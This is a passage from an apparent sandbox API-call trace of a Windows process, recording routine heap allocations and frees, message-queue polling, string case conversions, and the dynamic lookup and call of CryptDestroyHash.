hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0189.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0189.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0189.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0189.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0189.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0189.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0189.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0189.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0189.246] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0189.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0189.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0189.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0189.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0189.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0189.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0189.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0189.248] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0189.248] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0189.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0189.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0189.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0189.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0189.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.248] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0189.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0189.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0189.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0189.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0189.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0189.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0189.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.249] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0189.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.249] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0189.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0189.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0189.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0189.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0189.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0189.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0189.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0189.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0189.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0189.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0189.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0189.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0189.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0189.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa628 [0189.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0189.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0189.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0189.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0189.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0189.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4a8 [0189.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0189.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0189.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0189.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6b8 [0189.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0189.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0189.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa790 [0189.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0189.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0189.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0189.252] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0189.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0189.253] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0189.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0189.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0189.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.253] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.254] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0189.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.254] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0189.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0189.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0189.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0189.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0189.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0189.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0189.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0189.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0189.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0189.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0189.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0189.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0189.256] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0189.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0189.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0189.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0189.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0189.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0189.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0189.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0189.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0189.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0189.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0189.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0189.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0189.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0189.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0189.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466dd0 [0189.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0189.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0189.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0189.258] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0189.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0189.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0189.258] CryptDestroyHash (hHash=0xaa5860) returned 1 